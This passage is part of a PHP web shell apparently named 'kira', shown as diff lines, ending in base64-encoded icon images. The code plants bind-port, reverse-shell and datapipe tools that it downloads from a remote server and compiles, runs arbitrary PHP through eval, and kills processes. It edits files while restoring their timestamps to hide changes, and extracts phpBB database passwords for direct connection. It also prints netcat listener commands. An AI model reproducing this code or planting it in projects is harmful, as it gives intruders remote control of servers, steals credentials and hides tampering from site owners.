value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} +if ($act == "tools") +{ + $bndportsrcs = array( + "k1r4_bindport.pl"=>array("Using PERL","perl %path %port"), + "k1r4_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "k1r4_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "k1r4_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "k1r4_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "k1r4_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "<b>Result of binding port:</b><br>"; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + elseif (!$data = k1r4getsource($bind["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";} + } + echo "<br>"; + } + } + if (!empty($bcsubmit)) + { + echo "<b>Result of back connection:</b><br>"; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + elseif (!$data = k1r4getsource($bc["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>"; + } + } + } + if (!empty($dpsubmit)) + { + echo "<b>Result of datapipe-running:</b><br>"; + $v = $dpsrcs[$datapipe["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} + else + { + $srcpath = $tmpdir.$datapipe["src"]; + $w = explode(".",$datapipe["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + elseif (!$data = k1r4getsource($datapipe["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";} + } + echo "<br>"; + } + } + ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php + foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";} + ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form> +<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php +foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} +?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form> +Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br> +<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php +foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} +?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php +} +if ($act == "processes") +{ + echo "<b>Processes:</b><br>"; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} + $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo "</tr>"; + } + } + } + $head[$k] = "<b>".$head[$k]."</b>".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + foreach($tab as $i=>$k) + { + echo "<tr>"; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} + echo "</tr>"; + } + echo "</table>"; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>Result of execution this PHP-code</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + } + else + { + if ($eval_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), + array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), + array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), + array("Code","code"), + array("Session","phpsess"), + array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), + array("SDB","sdb"), + array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), + array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), + array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), + array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), + array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") + ); + echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} + elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} + else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} + echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; + } + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { + echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} + else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000<br>"; + $a1 = ""; + $a2 = ""; + for ($i=0; $i<strlen($str); $i++) + { + $a1 .= sprintf("%02X",ord($str[$i]))." "; + switch (ord($str[$i])) + { + case 0: $a2 .= "<font>0</font>"; break; + case 32: + case 10: + case 13: $a2 .= "&nbsp;"; break; + default: $a2 .= htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} + $a1 .= "<br>"; + $a2 .= "<br>"; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "<b>Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "</b><br>"; + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {k1r4exit();} + } + elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} + elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; + } + elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by kira. Please, report us for fix.";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + echo "</b><hr size=\"1\" noshade>"; + } + } + echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {k1r4exit();} + echo "</div>"; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "<center><b>Size:</b>&nbsp;"; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; + if ($imgsize != $v ) {echo $v;} + else {echo "<u>".$v."</u>";} + echo "</a>&nbsp;&nbsp;&nbsp;"; + } + echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 